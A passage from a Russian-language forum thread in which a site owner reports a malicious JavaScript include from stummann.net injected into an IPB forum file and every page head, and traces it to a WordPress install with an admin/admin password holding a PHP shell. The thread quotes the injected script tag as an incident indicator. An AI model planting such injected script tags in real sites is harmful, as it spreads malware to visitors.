Posted 22 августа, 201311 yr comment_40996 Здравствуйте, сегодня обнаружил у меня в ipb подключение js скрипта с сайта stummann.net. Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php? Выглядит это както так <script language="JavaScript" src="__stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script> Само содержание скрипта дает понять что он банально открывает маленький iframe, через который чаще всего распространяются вирусы. Проверяйте свои сообщества! А то побанят всех))
22 августа, 201311 yr comment_41003 Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php? На этот вопрос только расследование взлома может дать ответ. Надо изучать логи, бэкапы и т.д, и т.п.
22 августа, 201311 yr Author comment_41007 Уже все расследовал. Теория такая На 1 и том же сервере стоит еще несколько wordpress, на 1 из них стоял стандартный пароль admin admin Только что прогнал все файлы через антивирус, и именно на том сайте нашел php.shell и php.exploit. Так что это похоже на последствие массовой атаки на wordpress
22 августа, 201311 yr Author comment_41012 В шапке всех других сайтов тоже появился этот скрипт Он вставляется во всех php файлах где есть </head> Edited 22 августа, 201311 yr by andreuka
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.